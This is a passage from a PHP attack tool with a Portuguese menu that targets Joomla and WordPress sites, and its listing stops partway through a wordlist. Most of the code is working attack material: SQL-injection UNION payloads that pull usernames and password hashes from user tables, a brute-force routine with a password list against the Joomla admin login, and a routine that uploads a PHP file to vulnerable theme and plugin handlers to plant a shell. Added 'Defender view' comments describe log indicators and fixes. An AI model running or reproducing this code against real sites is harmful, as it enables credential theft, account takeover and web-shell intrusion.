  617. echo"\n \n $jsql/index.php?option=com_alameda&amp;controller=comments&amp;task=edit&amp;storeid=-1+union+all+select+concat_ws(username,0x3a,password)+from+jos_users--";
  618. }
  619.  
  620.  
  621. $rokdownloads="$jsql/index.php?option=com_alfurqan15x&action=viewayat&surano=1";
  622. $nananna=@file_get_contents($rokdownloads);
  623. if($nananna){
  624.  
  625. echo"\n $jsql/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
  626. }
  627. //////////com_timereturns ""
  628. $timereturns ="$jsql/index.php?option=com_timereturns&view=timereturns&id=7";
  629. $jais=file_get_contents($timereturns);
  630. if($jais){
  631. echo"\n $jsql/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--";
  632. }
  633. ////com_ezrealty
  634. $sa ="$jsql/index.php?option=com_ezrealty&amp;task=viewcategory&amp;id=1";
  635. $iua= file_get_contents($sa);
  636. if($iua){
  637. echo"$sa";
  638. }
  639. //////com_jobprofile
  640. $saaaa ="$jsql/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1";
  641. $ra895=file_get_contents($saaaa);
  642. if($ra895){
  643. echo"$jsql/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--";
  644. }else{echo"\n not found";}
  645. /////////////////////////////
  646.  
  647. }
  648.  
  649. ///////////////////////jce scaner
  650. if($joomlaid == 3 ){
  651. echo "Site Alvo http://\n";
  652. echo"Seu Site\n =====>";
  653. $jcesite =trim(fgets(STDIN,1024));
  654. echo"\n";
  655.  
  656. echo"\n";
  657. $jcepath = '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743';
  658. $alljce ="$jcesite$jcepath";
  659. $jceget = @file_get_contents($alljce);
  660. $jcechek=eregi('{"result":null,"error":"No function call specified!"}',$jceget);
  661. if($jcechek){
  662. echo "\n Vulneravel JCE";
  663. }
  664. else {
  665. echo "\n Nao Vulneravel";
  666.  
  667. }
  668.  
  669. }
  670.  
  671. if($joomlaid == 4){
  672. echo "Brute Force Joomla\n";
  673. echo"Seu Site\n =====>";
  674. $rujm =trim(fgets(STDIN,1024));
  675. echo"\n";
  676. echo"username ===>";
  677. $usjm =trim(fgets(STDIN,1024));
  678. echo"\n";
  679.  
  680. $sitejmi ="$rujm/administrator/index.php";
  681. $passwords =array('123456','123654','123123','112233','123321','102030','123451','123456789','654321','654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321","321321",
  682. "pass123",
  683. "password123",
  684. "demo",
  685. "demo123",
  686. "demopass",
  687. "123456789","administrator","123321","123456","1234567","12345678","123456789"
  688. ,"123456123456"
  689. ,"admin2010"
  690. ,"admin2011"
  691. ,"P@ssW0rd"
  692. ,"!@#$%^"
  693. ,"!@#$%^&*("
  694. ,"(*&^%$#@!"
  695. ,"111111"
  696. ,"222222"
  697. ,"333333"
  698. ,"444444"
  699. ,"555555"
  700. ,"666666"
  701. ,"777777"
  702. ,"888888"
  703. ,"999999"
  704. ,"admin2012"
  705. ,"admin2013"
  706. ,"admin2014"
  707. ,"password2013"
  708. ,"password2014");
  709.  
  710.  
  // Loads the login page at $sitejmi and returns the *name* of the first hidden input whose
  // value is "1"; the caller posts it back as "<name>=1" (presumably the Joomla form token —
  // confirm against the target form).
  // The token and session cookie are obtained once and reused for the whole password list,
  // so the token does not limit guessing.
  711. function token($sitejmi)
  712. {
  713. $curl = curl_init();
  714. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  715. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  716. curl_setopt($curl,CURLOPT_URL,$sitejmi);
  717. @curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  718. @curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  719. $get = curl_exec($curl);
  720. preg_match('/<input type="hidden" name="(.*?)" value="1"/', $get, $token);
  721. return $token[1];
  722. }
  723. $hash = token($sitejmi);
  // Makes one Joomla administrator login attempt: POSTs username, passwd, option=com_login,
  // task=login, a Base64 "return" value and "<token>=1" to $sitejmi. Prints the pair when the
  // response contains "Logout" (case-insensitive) and always returns the raw response.
  //   $sitejmi   "<site>/administrator/index.php"
  //   $usjm      account name
  //   $password  candidate password
  //   $hash      token field name returned by token()
  // Defender view: repeated com_login POSTs to /administrator/index.php for one account.
  // Restricting /administrator/ by source address, adding a second factor and throttling
  // failed logins are the matching controls.
  724. function brute($sitejmi,$usjm,$password,$hash)
  725. {
  726. $curl = curl_init();
  727. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  728. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  729. curl_setopt($curl,CURLOPT_URL, $sitejmi);
  730. curl_setopt($curl,CURLOPT_POSTFIELDS,"username={$usjm}&passwd={$password}&lang=&option=com_login&task=login&return=aW5kZXgucGhw&{$hash}=1");
  731. @curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  732. @curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  733. $brute = curl_exec($curl);
  734. if(eregi("Logout" , $brute))
  735. {
  736. echo " HI tut I found some password for you lol : \n
  737. **************************
  738. * username:{$usjm}\n
  739. * Password : {$password}\n
  740. ***************************
  741. ";
  742. }
  743. return $brute;
  744. }
  // Runs the whole list; there is no early exit, so every password is sent even after a hit.
  745. foreach($passwords as $password)
  746. {
  747. brute($sitejmi,$usjm,$password,$hash);
  748. }
  // Clean-up of the cookie jar: both the Windows ("del") and Unix ("rm") commands are issued,
  // and @ hides the failure of whichever does not apply. For forensics this means the session
  // file is deliberately removed from the operator's machine after the run.
  749. @system("del cookie.txt");
  750. @system("rm cookie.txt");
  751.  
  752.  
  753. }
  754.  
  755. if($id == 2){
  756. echo"
  757. __ ___ __ ___ ____ ____ __
  758. \ \ /\ / / '_ \ / __| / ___| /\ | __ \
  759. \ V V /| |_) | \__ \ ||___ /__\ | | | |
  760. \_/\_/ | .__/ |___/ \____|/----\|_| |_|
  761.  
  762. [1] SCANNER UPLOAD SHELL MULTIP BUGS :
  763. [2] SCANNER SQL INJECTIO USANDO MULTIP BUGS:
  764. [3] SCANNER PATH DISCLOSURE USANDO MULTIP ERROR:
  765. [4] SCANNER PLUGINS :
  766. ";
  767. echo"\n\n Selecione A Opcao == >";
  768. $wpid = trim(fgets(STDIN,1024));
  769. echo"\n";
  770.  
  771. }
  772.  
  773. if($wpid == 4){
  774. echo"
  775. **============================**
  776. ||============================||
  777. || WORDPRESS PLUGINS ||
  778. **============================**
  779. Site Alvo:
  780. ========>";$nanwp =trim(fgets(STDIN,1024));
  781. $sourcewp = @file_get_contents($nanwp);
  782. preg_match_all("#/plugins/(.*?)/#i", $source, $f19);
  783. $plugins=array_unique($f19[1]);
  784. if(count($plugins)==0){ echo "not found";}
  785. foreach($plugins as $plugin){
  786. echo "
  787. ************************
  788. Plugin : $plugin\n
  789. ************************
  790. ";
  791. }
  792.  
  793.  
  794.  
  795.  
  796.  
  797.  
  798.  
  799.  
  800.  
  801.  
  802. }
  // Upload-endpoint scanner (sub-menu option 1). Two phases:
  //   1. request a fixed list of plugin upload handlers and print the ones whose
  //      status line contains "OK";
  //   2. POST the local file named by $uploadfile to four theme/plugin upload
  //      handlers and then request the location where that file would land.
  // $uploadfile is "upload.php"; the top of the file writes an embedded,
  // base64-encoded upload form into that file before any menu is shown.
  //
  // Defender view: every path here is a file-upload handler shipped inside a
  // third-party plugin or theme. Log indicators are a burst of requests for
  // these paths from one client, POSTs to themify-ajax.php?upload=1, and an
  // unexpected upload.php under wp-content/uploads or a theme's uploads
  // directory. Removing or updating the listed components and disabling PHP
  // execution in upload directories addresses the whole class.
  803. if($wpid == 1) {
  804. echo"Entre Com Seu Site http://\n";
  805. echo"=====>";
  // Base URL of the site to scan, typed by the operator; used unvalidated below.
  806. $id1wp =trim(fgets(STDIN,1024));
  807. echo"Escaneando Para Upload Da Shell ......\n";
  808.  
  809.  
  // Phase 1 wordlist: upload handlers inside plugin directories (one entry
  // points at an uploads directory, one at wp-admin/includes).
  810. $wppath=array(
  811. "/wp-content/plugins/lazy-seo/lazyseo.php",
  812. "/wp-content/plugins/sfbrowser/connectors/php/sfbrowser.php",
  813. "/wp-content/plugins/wpmarketplace/uploadify/uploadify.php",
  814. "/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
  815. "/wp-content/plugins/kish-guest-posting/uploadify/scripts/uploadify.php",
  816. "/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php",
  817. "/wp-content/plugins/pica-photo-gallery/picaPhotosResize.php",
  818. "/wp-content/plugins/mac-dock-gallery/upload-file.php",
  819. "/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php",
  820. "/wp-content/plugins/custom-content-type-manager/upload_form.php",
  821. "/wp-content/plugins/front-file-manager/upload.php",
  822. "/wp-content/plugins/rbxgallery/uploader.php",
  823. "/wp-content/plugins/wpstorecart/php/upload.php",
  824. "/wp-content/plugins/omni-secure-files/plupload/examples/upload.php",
  825. "/wp-content/plugins/front-end-upload/upload.php",
  826. "/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php",
  827. "/wp-content/plugins/font-uploader/font-upload.php",
  828. "/wp-content/plugins/foxypress/uploadify/uploadify.php",
  829. "/wp-content/plugins/html5avmanager/lib/uploadify/custom.php",
  830. "/wp-content/plugins/asset-manager/upload.php",
  831. "/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
  832. "/wp-content/uploads/rsjp/attachments/",
  833. "/wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php",
  834. "/wp-content/plugins/wp-gpx-maps/wp-gpx-maps_admin_tracks.php",
  835. "/wp-content/plugins/user-meta/framework/helper/uploader.php",
  836. "/wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/script.php",
  837. "/wp-content/plugins/grapefile/grapeupload.php",
  838. "/wp-content/plugins/grapefile/grapeupload3.php",
  839. "/wp-content/plugins/grapefile/grapeupload2.php",
  840. "/wp-content/plugins/grapefile/grapeupload4.php",
  841. "/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php",
  842. "/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html",
  843. "/wp-admin/includes/heaber.php",
  844. "/wp-content/plugins/complete-gallery-manager/frames/upload-images.php"
  845.  
  846. );
  // Phase 1 probe: base URL + path, one request each via get_headers(). A path
  // is reported when the first header line contains "OK"; the response body is
  // never inspected.
  847. foreach($wppath as $patwp) {
  848. $lawp ="$id1wp$patwp";
  849. $wpnon =get_headers($lawp);
  850. $wppreg =preg_match("/OK/",$wpnon[0]);
  851. if($wppreg){
  852. echo"\nEncontrado ===>$lawp\n ";
  853. }
  854. }
  855.  
  856.  
  // Phase 2, attempt 1: multipart POST to the Bloggie theme's themify-ajax.php
  // with the file in a field named 'Filedata'. $postResult is stored but not read.
  857. $a1zaz2azaw5a6 = curl_init("$id1wp/wp-content/themes/Bloggie/themify/themify-ajax.php?upload=1");
  858. curl_setopt($a1zaz2azaw5a6, CURLOPT_POST, true);
  859. curl_setopt($a1zaz2azaw5a6, CURLOPT_POSTFIELDS,
  860. array('Filedata'=>"@$uploadfile"));
  861. curl_setopt($a1zaz2azaw5a6, CURLOPT_RETURNTRANSFER, 1);
  862. $postResult = curl_exec($a1zaz2azaw5a6);
  863. curl_close($a1zaz2azaw5a6);
  // Verification request for the dropped file; note the double slash after the
  // host, which shows up verbatim in access logs.
  864. $aszjdhozahod=file_get_contents("$id1wp//wp-content/themes/Bloggie/uploads/upload.php");
  865. if($aszjdhozahod){
  866. echo"$id1wp/wp-content/themes/Bloggie/uploads/upload.php";
  867. }
  868.  
  // Attempt 2: same request against the pinboard theme.
  869. $a1zaz2azaw5a6sqdqsdqsdqsd = curl_init("$id1wp/wp-content/themes/pinboard/themify/themify-ajax.php?upload=1");
  870. curl_setopt($a1zaz2azaw5a6sqdqsdqsdqsd, CURLOPT_POST, true);
  871. curl_setopt($a1zaz2azaw5a6sqdqsdqsdqsd, CURLOPT_POSTFIELDS,
  872. array('Filedata'=>"@$uploadfile"));
  873. curl_setopt($a1zaz2azaw5a6sqdqsdqsdqsd, CURLOPT_RETURNTRANSFER, 1);
  874. $postResult = curl_exec($a1zaz2azaw5a6sqdqsdqsdqsd);
  875. curl_close($a1zaz2azaw5a6sqdqsdqsdqsd);
  876. $ezfze=file_get_contents("$id1wp/wp-content/themes/pinboard/uploads/upload.php");
  877. if($ezfze){
  878. echo"$id1wp/wp-content/themes/pinboard/uploads/upload.php";
  879.  
  880. }
  881.  
  // Attempt 3: same request against the blogfolio theme.
  882. $hamzasec = curl_init("$id1wp/wp-content/themes/blogfolio/themify/themify-ajax.php?upload=1");
  883. curl_setopt($hamzasec, CURLOPT_POST, true);
  884. curl_setopt($hamzasec, CURLOPT_POSTFIELDS,
  885. array('Filedata'=>"@$uploadfile"));
  886. curl_setopt($hamzasec, CURLOPT_RETURNTRANSFER, 1);
  887. $postResult = curl_exec($hamzasec);
  888. curl_close($hamzasec);
  // Here the follow-up request is for the uploads/ directory, not the file; the
  // file URL is printed if that request returns any content.
  889. $yuyy=@file_get_contents("$id1wp//wp-content/themes/blogfolio/uploads/");
  890. if($yuyy){
  891.  
  892. echo"$id1wp//wp-content/themes/blogfolio/uploads/upload.php";
  893.  
  894. }
  895.  
  896.  
  897. ///////////////////////////////////////////////////////////////////
  // Attempt 4: POST to the page-flip-image-gallery plugin's upload.php, with
  // the file in a field named 'orange_themes'.
  898. $lamapazlazmlqclmdpg = curl_init("$id1wp/wp-content/plugins/page-flip-image-gallery/upload.php");
  899. curl_setopt($lamapazlazmlqclmdpg, CURLOPT_POST, true);
  900. curl_setopt($lamapazlazmlqclmdpg, CURLOPT_POSTFIELDS,
  901. array('orange_themes'=>"@$uploadfile")); curl_setopt($lamapazlazmlqclmdpg,
  902. CURLOPT_RETURNTRANSFER, 1);
  903. $postResult = curl_exec($lamapazlazmlqclmdpg);
  904. url_close($lamapazlazmlqclmdpg);
  // Follow-up request for upload.php directly under wp-content/uploads.
  905. $lalalal=@file_get_contents("$id1wp/wp-content/uploads/upload.php");
  906. if($lalalal){
  907. echo"$id1wp/wp-content/uploads/upload.php";
  908. }
  909.  
  910.  
  911. }
  // SQL-injection scanner (sub-menu option 2). Each list entry is a URL path and
  // query string carrying a UNION SELECT payload. Most entries select
  // user_login / user_pass / user_email from the WordPress users table
  // (wp_users; one entry uses wp_tbv_users); two entries only select
  // user()/version()/database().
  //
  // Defender view: these requests stand out in access logs and to a WAF through
  // UNION and SELECT in the query string, concat( with 0x3a / 0x7c / CHAR(58)
  // separators, /**/ used in place of spaces, and trailing /* or -- comment
  // markers. The fix on the server side is parameterised queries in the plugin
  // code and removal of outdated plugins. If any such request is found to have
  // returned rows, the hashes in user_pass should be treated as exposed and the
  // passwords reset.
  912. if($wpid == 2) {
  913. echo"Entre Com Seu Site http://\n";
  914. echo"=====>";
  // Base URL typed by the operator; used unvalidated below.
  915. $wpsql =trim(fgets(STDIN,1024));
  916. echo"Escaneando Por SQL ......\n";
  917.  
  918.  
  919. $sqlwp12=array("index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*",
  920. "index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*",
  921. "index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**SELECT**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23",
  922. "index?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*",
  923. "wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--",
  924. "wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--",
  925. "wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,conca(0x7c,user_login,0x7c,user_pass,0x7c),null,null,null,null,null,null,null,null%20%20from%20wp_users",
  926. "wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users",
  927. "wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users",
  928. "sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  929. "sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*",
  930. "forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  931. "index?page_id=2&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201",
  932. "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*",
  933. "wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain",
  934. "wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  935. "myLDlinker.php?url=-2/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  936. "?page_id=2/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2",
  937. "wp-content/themes/limon/cplphoto.php?postid=-2+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=2",
  938. "?event_id=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  939. "wp-content/plugins/photoracer/viewimg.php?id=-99999+union+select+0,1,2,3,4,user(),6,7,8/*",
  940. "?page_id=2&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users/*",
  941. "wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*",
  942. "mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--",
  943. "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",
  944. "wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain",
  945. "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*");
  // One request per entry: base URL + "/" + entry. The URL is printed when the
  // first header line contains "OK"; the response body is not examined.
  946. foreach($sqlwp12 as $wpsaql12){
  947. $wppasq="$wpsql/$wpsaql12";
  948. $wppreg=get_headers($wppasq);
  949. $nawp=preg_match("/OK/",$wppreg[0]);
  950. if($nawp){
  951.  
  952. echo"\nEncontrado ======>\n $wppasq";
  953. }
  954.  
  955. }
  956.  
  957. }
  958.  
  // Path-disclosure scanner (sub-menu option 3). Requests WordPress core files
  // (wp-settings.php and files under wp-includes/) directly over HTTP.
  // NOTE(review): the menu labels this "path disclosure using errors";
  // presumably the aim is a PHP error message that prints the server's
  // filesystem path when such a file is loaded outside WordPress - the code
  // itself never reads the response body, so confirm against the author's intent.
  //
  // Defender view: with display_errors off in production such a request returns
  // nothing useful, and denying direct HTTP access to wp-includes/*.php at the
  // web server removes the probe surface. A run of direct requests for these
  // files from one client is the log indicator.
  959. if($wpid == 3) {
  960. echo"Entre Com Seu Site http://\n";
  961. echo"=====>";
  // Base URL typed by the operator; used unvalidated below.
  962. $wpdsl =trim(fgets(STDIN,1024));
  963. echo"Escaneando Path Disclosure ......\n";
  // class-wp-xmlrpc-server.php appears three times, so it is requested three times.
  964. $wpwpwp=array("/wp-settings.php",
  965. "/wp-includes/admin-bar.php",
  966. "/wp-includes/author-template.php",
  967. "/wp-includes/canonical.php",
  968. "/wp-includes/category-template.php",
  969. "/wp-includes/class-wp-embed.php",
  970. "/wp-includes/media.php",
  971. "/wp-includes/ms-default-constants.php",
  972. "/wp-includes/ms-default-filters.php",
  973. "/wp-includes/ms-settings.php",
  974. "/wp-includes/post.php",
  975. "/wp-includes/rss.php",
  976. "/wp-includes/user.php",
  977. "/wp-includes/theme.php",
  978. "/wp-includes/vars.php",
  979. "/wp-includes/class-wp-http-ixr-client.php",
  980. "/wp-includes/class-wp-image-editor-gd.php",
  981. "/wp-includes/class-wp-image-editor-imagick.php",
  982. "/wp-includes/class-wp-xmlrpc-server.php",
  983. "/wp-includes/class-wp-xmlrpc-server.php",
  984. "/wp-includes/class-wp-xmlrpc-server.php",
  985. "/wp-includes/class.wp-scripts.php",
  986. "/wp-includes/class.wp-styles.php",
  987. "/wp-includes/comment-template.php",
  988. "/wp-includes/default-filters.php",
  989. "/wp-includes/default-widgets.php",
  990. "/wp-includes/feed-atom-comments.php",
  991. "/wp-includes/feed-atom.php",
  992. "/wp-includes/feed-rdf.php",
  993. "/wp-includes/feed-rss.php",
  994. "/wp-includes/feed-rss2-comments.php",
  995. "/wp-includes/feed-rss2.php",
  996. "/wp-includes/functions.php");
  // One request per path: base URL + path. The URL is printed when the first
  // header line contains "OK".
  997. foreach($wpwpwp as $dzhacker){
  998. $allwp="$wpdsl$dzhacker";
  999. $zebi=get_headers($allwp);
  1000. $nemi=preg_match("/OK/",$zebi[0]);
  1001. if($nemi){
  1002. echo "\n Encontrado ==>\n$allwp";
  1003.  
  1004. }
  1005.  
  1006.  
  1007. }
  1008.  
  1009. }
  // General content-discovery scanner, run when $id is 3 ($id is assigned
  // outside this excerpt). The banner names its scope: SQL, backup, XSS, upload
  // path, shell. One flat wordlist is appended to an operator-supplied base URL
  // and every entry is requested once.
  //
  // Defender view: the list mixes four kinds of target - web-shell file names
  // left by earlier intrusions, forum-software include files, backup archives /
  // SQL dumps / info files in the web root, and page names with id-, page- or
  // file-style parameters. Keeping backups and dumps outside the document root,
  // removing phpinfo.php and readable error logs, and alerting on a rapid run
  // of mostly-404 requests from one client covers what this scan looks for.
  // Every entry already starts with "/" and the loop joins it to the base with
  // another "/", so the requests carry a double slash after the host - a
  // convenient log signature.
  1010. if($id == 3 ){
  1011.  
  1012. echo"
  1013. ***********************************************
  1014. ,--^----------,--------,-----,-------^--, *
  1015. | ||||||||| `--------' | O *
  1016. `+---------------------------^----------| *
  1017. `\_,-------, _________________________| *
  1018. / XXXXXX /`| / *
  1019. / XXXXXX / `\ / *
  1020. / XXXXXX /\______( *
  1021. / XXXXXX / *
  1022. / XXXXXX / *
  1023. (________( *
  1024. `------' *
  1025. ***********************************************
  1026. ** **
  1027. ** SQl,Backup,Xss,Upload Path,Shell **
  1028. ** **
  1029. ***********************************************
  1030. Comando http://
  1031. ***********************************************
  1032. Entre Com Seu Site ====>";
  // Base URL typed by the operator; used unvalidated below.
  1033. $gnsc =trim(fgets(STDIN,1024));
  1034. $dangpath=array(
  // Well-known web-shell and uploader file names; a hit on one of these on your
  // own server is a sign of an earlier compromise and worth investigating.
  1035. "/wso.php",
  1036. "/c99.php",
  1037. "/upload.php",
  1038. "/upload/upload.php",
  1039. "/uploads/c99.php",
  1040. "/uploads/wso.php",
  // Forum-software include files. NOTE(review): names further down such as
  // vbulletin_methods.php and vb.zip suggest vBulletin; the code does not say.
  1041. "/includes/api/commonwhitelist_2.php",
  1042. "/includes/api/commonwhitelist_5.php",
  1043. "/includes/api/commonwhitelist_6.php",
  1044. "/includes/api/1/album_album.php",
  1045. "/includes/api/1/album_editalbum.php",
  1046. "/includes/api/1/album_latest.php",
  1047. "/includes/api/1/album_overview.php",
  1048. "/includes/api/1/album_picture.php",
  1049. "/includes/api/1/album_user.php",
  1050. "/includes/api/1/announcement_edit.php",
  1051. "/includes/api/1/announcement_view.php",
  1052. "/includes/api/1/api_cmscategorylist.php",
  1053. "/includes/api/1/api_cmssectionlist.php",
  1054. "/includes/api/1/api_forumlist.php",
  1055. "/includes/api/1/api_getnewtop.php",
  1056. "/includes/api/1/api_getsecuritytoken.php",
  1057. "/includes/api/1/api_getsessionhash.php",
  1058. "/includes/api/1/api_init.php",
  1059. "/includes/api/1/api_mobilepublisher.php",
  1060. "/includes/api/1/api_usersearch.php",
  1061. "/includes/api/1/blog_blog.php",
  1062. "/includes/api/1/blog_bloglist.php",
  1063. "/includes/api/1/blog_comments.php",
  1064. "/includes/api/1/blog_custompage.php",
  1065. "/includes/api/1/blog_dosendtofriend.php",
  1066. "/includes/api/1/blog_list.php",
  1067. "/includes/api/1/blog_members.php",
  1068. "/includes/api/1/blog_post_comment.php",
  1069. "/includes/api/1/blog_post_editblog.php",
  1070. "/includes/api/1/blog_post_editcomment.php",
  1071. "/includes/api/1/blog_post_edittrackback.php",
  1072. "/includes/api/1/blog_post_newblog.php",
  1073. "/includes/api/1/blog_post_postcomment.php",
  1074. "/includes/api/1/blog_post_updateblog.php",
  1075. "/includes/api/1/blog_sendtofriend.php",
  1076. "/includes/api/1/blog_subscription_entrylist.php",
  1077. "/includes/api/1/blog_subscription_userlist.php",
  1078. "/includes/api/1/blog_usercp_addcat.php",
  1079. "/includes/api/1/blog_usercp_editcat.php",
  1080. "/includes/api/1/blog_usercp_editoptions.php",
  1081. "/includes/api/1/blog_usercp_editprofile.php",
  1082. "/includes/api/1/blog_usercp_modifycat.php",
  1083. "/includes/api/1/blog_usercp_updateprofile.php",
  1084. "/includes/api/1/editpost_editpost.php",
  1085. "/includes/api/1/editpost_updatepost.php",
  1086. "/includes/api/1/forum.php",
  1087. "/includes/api/1/forumdisplay.php",
  1088. "/includes/api/1/inlinemod_domergeposts.php",
  1089. "/includes/api/1/list.php",
  1090. "/includes/api/1/login_lostpw.php",
  1091. "/includes/api/1/member.php",
  1092. "/includes/api/1/memberlist_search.php",
  1093. "/includes/api/1/misc_showattachments.php",
  1094. "/includes/api/1/misc_whoposted.php",
  1095. "/includes/api/1/newreply_newreply.php",
  1096. "/includes/api/1/newreply_postreply.php",
  1097. "/includes/api/1/newthread_postthread.php",
  1098. "/includes/api/1/newthread_newthread.php",
  1099. "/includes/api/1/poll_newpoll.php",
  1100. "/includes/api/1/poll_polledit.php",
  1101. "/includes/api/1/poll_showresults.php",
  1102. "/includes/api/1/private_editfolders.php",
  1103. "/includes/api/1/private_insertpm.php",
  1104. "/includes/api/1/private_messagelist.php",
  1105. "/includes/api/1/private_newpm.php",
  1106. "/includes/api/1/private_showpm.php",
  1107. "/includes/api/1/private_trackpm.php",
  1108. "/includes/api/1/profile_editattachments.php",
  1109. "/includes/api/1/profile_editoptions.php",
  1110. "/includes/api/1/profile_editprofile.php",
  1111. "/includes/api/1/register_addmember.php",
  1112. "/includes/api/1/register_checkdate.php",
  1113. "/includes/api/1/search_process.php",
  1114. "/includes/api/1/search_showresults.php",
  1115. "/includes/api/1/showthread.php",
  1116. "/includes/api/1/subscription_addsubscription.php",
  1117. "/includes/api/1/subscription_editfolders.php",
  1118. "/includes/api/1/subscription_viewsubscription.php",
  1119. "/includes/api/1/threadtag_managetags.php",
  1120. "/includes/api/2/album_picture.php",
  1121. "/includes/api/2/api_blogcategorylist.php",
  1122. "/includes/api/2/blog_blog.php",
  1123. "/includes/api/2/blog_bloglist.php",
  1124. "/includes/api/2/blog_list.php",
  1125. "/includes/api/2/blog_subscription_entrylist.php",
  1126. "/includes/api/2/blog_subscription_userlist.php",
  1127. "/includes/api/2/blog_usercp_groups.php",
  1128. "/includes/api/2/content.php",
  1129. "/includes/api/2/editpost_editpost.php",
  1130. "/includes/api/2/forumdisplay.php",
  1131. "/includes/api/2/member.php",
  1132. "/includes/api/2/newreply_newreply.php",
  1133. "/includes/api/2/forum.php",
  1134. "/includes/api/2/poll_newpoll.php",
  1135. "/includes/api/2/poll_polledit.php",
  1136. "/includes/api/2/poll_showresults.php",
  1137. "/includes/api/2/private_messagelist.php",
  1138. "/includes/api/2/private_trackpm.php",
  1139. "/includes/api/2/profile_editattachments.php",
  1140. "/includes/api/2/search_showresults.php",
  1141. "/includes/api/2/showthread.php",
